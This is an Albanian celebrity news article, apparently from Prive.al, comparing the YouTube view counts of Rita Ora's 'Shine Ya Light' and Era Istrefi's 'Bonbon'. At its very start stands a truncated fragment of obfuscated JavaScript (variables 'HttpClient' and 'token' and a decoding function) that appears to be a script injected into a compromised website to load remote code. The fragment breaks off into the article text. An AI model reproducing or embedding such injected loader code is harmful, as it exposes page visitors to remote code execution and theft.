;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Nuk do besoni sa shikime ka sot ‘Shine Ya Light’ e Rita Orës!

By

Kur Rita Ora erdhi në Prishtinë në shtator të 2012-tës, ajo u shndërrua në kryetemë për javë të tëra rresht.

Me një mision të qartë, promovimin e vlerave të Kosovës si republika më e re në Europë, ylli botëror në ngjitje në disa lokacione në kryeqytet dhe përreth xhiroi këngën ‘Shine Ya Light’.

Ndjenja e krenarisë shpërtheu gjithandej me një eufori të madhe për këtë publicitet që për shtetin tonë të ri vlente më shumë se investimet e kota milionëshe të qeverisë.

Por të paktën në Youtube, kjo këngë nuk ka ecur mjaft mirë. Pothuajse katër vite nga lançimi ajo ka grumbulluar rreth 16 milionë shikime që janë shumë pak krahasuar bie fjala me këngën ‘Bonbon’ të Era Istrefit.

Kjo e fundit, në një muaj e gjysmë ka grumbulluar mbi 17 milionë shikime nga e gjithë bota.

Ndryshe, ‘Shine Ya Light’ sikurse edhe çdo këngë tjetër e Ritës akoma nuk mund të shihet në Youtube shkaku i bllokimeve. /Prive.al/

Artikuj të ngjashëm